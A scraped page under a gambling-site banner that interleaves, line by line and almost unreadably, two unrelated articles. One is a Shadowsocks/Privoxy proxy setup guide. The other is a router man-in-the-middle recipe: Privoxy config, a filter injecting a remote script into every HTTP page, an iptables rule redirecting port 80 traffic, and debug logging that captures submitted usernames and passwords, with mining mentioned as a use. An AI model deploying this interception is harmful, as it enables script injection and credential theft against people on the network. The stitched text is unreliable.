【金沙澳门官网网址】获取用户名

作者: 金沙澳门官网网址  发布:2019-06-26

看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。

转自:

注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.

这几天想配置PHP

Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。

Laravel框架,Laravel框架需要Composer安装。结果安装Composer的时候遭遇到了GFW,光在浏览器上穿墙还不够,还要在终端上穿墙。使用Shadowsocks在浏览器上穿墙很简单,但是在终端穿墙以前没接触过,这次花了一晚上搞定了。

Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。

安装Shadowsocks

----来自百度百科

既然是用Shadowsocks穿墙,那么首先需要安装Shadowsocks。在维基百科上对Shadowsocks的描述如下:

privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....

Shadowsocks使用自行设计的协议进行加密通信。加密算法有AES、Blowfish、IDEA、RC4等,除创建TCP连接外无需握手,每次请求只转发一个连接,因此使用起来网速较快,在移动设备上也比较省电。然而协议对双方的身份验证仅限于预共享密钥(pre-shared keys),亦无完全前向保密(perfect forward secrecy),也未曾有安全专家公开分析或评估协议及其实现。Shadowsocks不能替代TLS或者VPN,本质上只是设置了密码的网络代理协议,不能用作匿名通信方案,该协议的目标不在于提供完整的通信安全机制,主要是为了协助上网用户在严苛的网络环境中突破封锁。在某些极端的环境下,通过深度包检测(DPI)也有可能识别出协议特征。为了确保安全,用户应做好额外的加密和验证措施,以免泄露信息,无论使用的服务器来源是否可靠。

先上图..

通过客户端以指定的密码、加密方式和端口连接服务器,成功连接到服务器后,客户端在用户的电脑上构建一个本地socks5代理。使用时将流量分到本地SOCKS5代理,客户端将自动加密并转发流量到服务器,服务器以同样的加密方式将流量回传给客户端,以此实现代理上网。

金沙澳门官网网址 1

虽然不是一个完整的通信安全机制,不过只要能突破封锁就可以了。Shadowsocks的安装很简单。

环境:免费的K3刷官改版.

~$ sudo apt-get install python-gevent python-pip

金沙澳门官网网址 ,刷完系统后 安装 privoxy

~$ sudo pip install shadowsocks

命令:

安装后需要对Shadowsocks进行配置,在/etc目录下新建shadowsocks.json文件,添加以下内容。

opkg install privoxy

{

然后编辑 config 文件

"server": "your server ip",

vi /tmp/media/nand/opt/etc/privoxy/config

"server_port": 15216,

修改listen-address 为如下形式

"local_address": "127.0.0.1",

listen-address  192.168.2.1:8118
accept-intercepted-requests 1

"local_port": 1080,

192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

"password": "your password",

action 文件

"method": "aes-256-cfb",

vi /tmp/media/nand/opt/etc/privoxy/user.action

"fast_open": true,

加入以下内容 代表拦截所有网址

"workers": 1

 filter{ad}}
.*

}

filter文件

随后就可以启动Shadowsocks了。

vi /tmp/media/nand/opt/etc/privoxy/user.filter

FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g

~$ sslocal -c /etc/shadowsocks.json

很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

但是这样每次启动后都需要手动输一次命令,比较麻烦,所以设置为启动时自动运行。在/etc/rc.local中添加如下命令,注意在exit 0之前。

这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....

sudo sslocal -c /etc/shadowsocks.json

最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

注意,这里必须用sudo才行,具体原因不明。

iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118

至此,Shadowsocks已经配置成功。

最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...

Chrome穿墙

privoxy功能不只是修改网页内容,还可以记录访问记录..
金沙澳门官网网址 2

使用Chrome穿墙需要用到一个插件——Proxy SwitchyOmega。

甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

安装好这个插件以后,按照如下配置这个插件。

修改config中的debug级别即可...(默认的日志只记录请求的url.)

金沙澳门官网网址 3

至于privoxy还能干嘛,大家自己发挥吧...

金沙澳门官网网址 4

所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..

平时使用的使用使用自动切换模式即可,遇到实在打不开的网页,直接使用Shadowsocks模式。

终端穿墙

浏览器能穿墙就已经能满足绝大多数需求了,但是有的时候终端也必须穿墙,就比如Composer。关于终端穿墙,本人尝试了很多种方案,比如Privoxy、Proxychains和Polipo,最后觉得还是Privoxy最好。

为什么终端需要单独穿墙呢?难道Shadowsock不能“全局”代理么?这个问题当时困惑了我很久,最后一句话点醒了我。

Shadowsocks是一个使用SOCKS5(或者SOCK4之类)协议的代理,它只接受SOCKS5协议的流量,不接受HTTP或者HTTPS的流量。所以当你在Chrome上能穿墙的时候,是Proxy

SwitchyOmega插件把HTTP和HTTPS流量转换成了SOCKS协议的流量,才实现了Shadowsocks的代理。而终端是没有这样的协议转换的,所以没法直接使用Shadowsock进行代理。这时候就需要一个协议转换器,这里我用了Privoxy。

本文由金沙澳门官网发布于金沙澳门官网网址,转载请注明出处:【金沙澳门官网网址】获取用户名

关键词: 金沙澳门官网